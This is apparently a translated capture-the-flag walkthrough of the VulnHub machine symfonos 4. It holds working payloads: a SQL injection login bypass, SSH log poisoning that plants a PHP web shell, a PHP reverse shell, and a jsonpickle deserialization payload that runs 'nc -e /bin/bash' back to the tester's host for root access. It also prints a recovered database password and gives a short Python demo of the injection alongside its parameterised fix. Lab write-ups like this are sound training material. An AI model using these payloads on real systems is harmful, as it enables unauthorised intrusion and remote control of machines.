[攻略鴨] symfonos 4: VulnHub target machine walkthrough

The contents of this article are purely fictional; 攻略鴨 asks for your follow and likes on Bilibili!
Target IP: 192.168.31.215
Attacker (test machine) IP: 192.168.31.38
External reconnaissance
http://192.168.31.215/ serves nothing but a single image.
Port scan
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.215/FUZZ -e .php,.txt -c
/gods
/atlantis.php
/sea.php
http://192.168.31.215/gods/ lists three log files, hades.log, zeus.log and poseidon.log, each a short introduction to the mythological figure of that name.
Searching the returned content in a search engine identifies it as the output of the uptime command.
http://192.168.31.215/atlantis.php presents a login form.
Logging in with a SQL injection "universal password" (a tautology submitted in the login fields) yields a 302 redirect to sea.php; clicking the hades entry changes the URL to http://192.168.31.215/sea.php?file=hades, whose content is the hades.log introduction.
Testing for file inclusion
GET /sea.php?file=../../../../../../etc/passwd
GET /sea.php?file=../../../../../etc/passwd%00
Both fail. The reason becomes clear once sea.php is read later: the parameter is embedded as "gods/" . $_GET['file'] . ".log", so the first request opens /etc/passwd.log, and PHP 5.3.4 and later refuse include paths that contain a null byte, so the %00 truncation trick is rejected as well.
Since hades.log, zeus.log and poseidon.log all carry the .log suffix, try another file whose name ends in .log:
GET /sea.php?file=../../../../../var/log/auth
This returns the SSH log (/var/log/auth.log), which opens the door to log poisoning: sshd writes the username of a failed login into auth.log verbatim, so a PHP tag supplied as the SSH username lands in the very file sea.php includes:
ssh '<?php phpinfo(); ?>'@192.168.31.215
GET /sea.php?file=../../../../../var/log/auth
The phpinfo page comes back, proving that the included log is executed as PHP. Plant a web shell the same way:
ssh '<?php system($_GET['cmd']); ?>'@192.168.31.215
(Mind the shell quoting: the inner single quotes around cmd close and reopen the quoted string, so what actually reaches the log is system($_GET[cmd]). PHP 7, which this Debian 10 target runs, accepts the bare word with a notice; PHP 8 would throw an undefined-constant Error instead.)
GET /sea.php?cmd=id&file=../../../../../var/log/auth
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Start a listener on the test machine and send a PHP reverse shell through cmd (the URL-encoded form of php -r '$sock=fsockopen("192.168.31.38",9000);exec("/bin/sh -i <&3 >&3 2>&3");'):
$ nc -nvlp 9000
GET /sea.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.31.38%22%2C9000%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&file=../../../../../var/log/auth
Upgrade the resulting shell to a TTY:
$ python -c 'import pty;pty.spawn("/bin/bash")'
Local enumeration
www-data@MiWiFi-R3600-srv:/var/www/html$ cat atlantis.php
<?php
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'yVzyRGw3cG2Uyt2r');
  $db = new PDO("mysql:host=localhost:3306;dbname=db", DB_USERNAME,DB_PASSWORD);
  $statement = $db->prepare("Select * from users where username='".$username."' and pwd='".$pwd."'");
  $statement->execute();
This is the injection behind the login bypass: prepare() gives no protection once $username and $pwd have already been concatenated into the SQL string, and pwd is compared directly as a literal, so the stored passwords are not hashed. The application also connects as the MySQL root account, whose password is now known.
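The injection itself, as an added example that is not the page's code: an in-memory sqlite3 stand-in for the target's users table (its rows and the password value are constructed, the real ones are never shown), the exact query string atlantis.php builds, and the parameterised form that closes the hole. The "universal password" used is the classic tautology ' OR '1'='1.

```python
import sqlite3

BYPASS = "' OR '1'='1"  # the classic "universal password" tautology


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the target's users table (its real rows are
    never shown in the writeup); in-memory sqlite3 so this runs offline."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    db.execute("INSERT INTO users VALUES ('poseidon', 'hypothetical-password')")
    return db


def vulnerable_sql(username: str, pwd: str) -> str:
    """The string atlantis.php hands to prepare(): input is glued in first,
    so prepare() only ever sees attacker-shaped SQL."""
    return ("SELECT * FROM users WHERE username='" + username
            + "' AND pwd='" + pwd + "'")


def login_vulnerable(db: sqlite3.Connection, username: str, pwd: str) -> bool:
    """Mirror of the atlantis.php check: any row back means 'logged in'."""
    return db.execute(vulnerable_sql(username, pwd)).fetchone() is not None


def login_fixed(db: sqlite3.Connection, username: str, pwd: str) -> bool:
    """Bound parameters: the driver sends values separately, so a quote in the
    input is data, never SQL. (PDO equivalent: ? placeholders + execute([...]).)"""
    row = db.execute(
        "SELECT * FROM users WHERE username=? AND pwd=?", (username, pwd)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql(BYPASS, BYPASS))
    print("vulnerable, no credentials:", login_vulnerable(db, BYPASS, BYPASS))
    print("fixed, no credentials:     ", login_fixed(db, BYPASS, BYPASS))
```

With both fields set to the tautology the concatenated WHERE clause ends in OR '1'='1', so the first row is returned and the attacker is logged in as whoever sorts first; the bound version returns nothing for the same input.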
www-data@MiWiFi-R3600-srv:/var/www/html$ cat sea.php
<?php
include("gods/". $_GET['file']. '.log');
?>
www-data@MiWiFi-R3600-srv:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
poseidon:x:1000:1000:,,,:/home/poseidon:/bin/bash
Locally listening ports
tcp     LISTEN   0        128            127.0.0.1:8080          0.0.0.0:*
A service is bound to loopback only on port 8080, so it is invisible from the outside.
Useful software:
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget
/opt is normally empty; here /opt/code exists.
www-data@symfonos4:/opt/code$ ls -alh
drwxr-xrwx 4 root root 4.0K Aug 19  2019 .
drwxr-xr-x 3 root root 4.0K Aug 18  2019 ..
-rw-r--r-- 1 root root  942 Aug 19  2019 app.py
-rw-r--r-- 1 root root 1.5K Aug 19  2019 app.pyc
drwxr-xr-x 4 root root 4.0K Aug 19  2019 static
drwxr-xr-x 2 root root 4.0K Aug 19  2019 templates
-rw-r--r-- 1 root root  215 Aug 19  2019 wsgi.pyc
Note the mode on the directory itself: it is world-writable (o+w, no sticky bit) even though every file inside is owned by root.
cat app.py
app.py turns out to use jsonpickle for the user object.
Forward port 8080 with socat (run on the target, so that the loopback-only service becomes reachable from the test machine):
socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080
Visit http://192.168.31.215:8081/whoami and capture the cookies:
Cookie: PHPSESSID=q7ctie2m9dp9fhv48m82t28204; username=eyJweS9vYmplY3QiOiAiYXBwLlVzZXIiLCAidXNlcm5hbWUiOiAiUG9zZWlkb24ifQ==
Base64-decoding username gives: {"py/object": "app.User", "username": "Poseidon"}
The flask-json-pickle vulnerability
Searching for a jsonpickle exploit turns up the flask-json-pickle vulnerability. Its PoC payload:
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
Start a listener on the test machine: nc -nvlp 3334
Swap the callable for os.system and make the argument a reverse shell (-e works here because the target's netcat is nc.traditional, listed above):
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "os.system"}, {"py/tuple": ["/usr/bin/nc -e /bin/bash 192.168.31.38 3334"]}, null, null, null]}
Base64-encode this JSON, send it as the value of the username cookie (the one decoded above) to the forwarded port, and the listener receives a shell. It arrives as root, so no separate privilege escalation is needed:
id
uid=0(root) gid=0(root) groups=0(root)
Miscellaneous
Flag:
# cat /root/proof.txt
Congrats on rooting symfonos:3!
Open questions
1. In the flask-json-pickle exploit, every method other than nc was unsuccessful;
2. Are there other privilege escalation methods?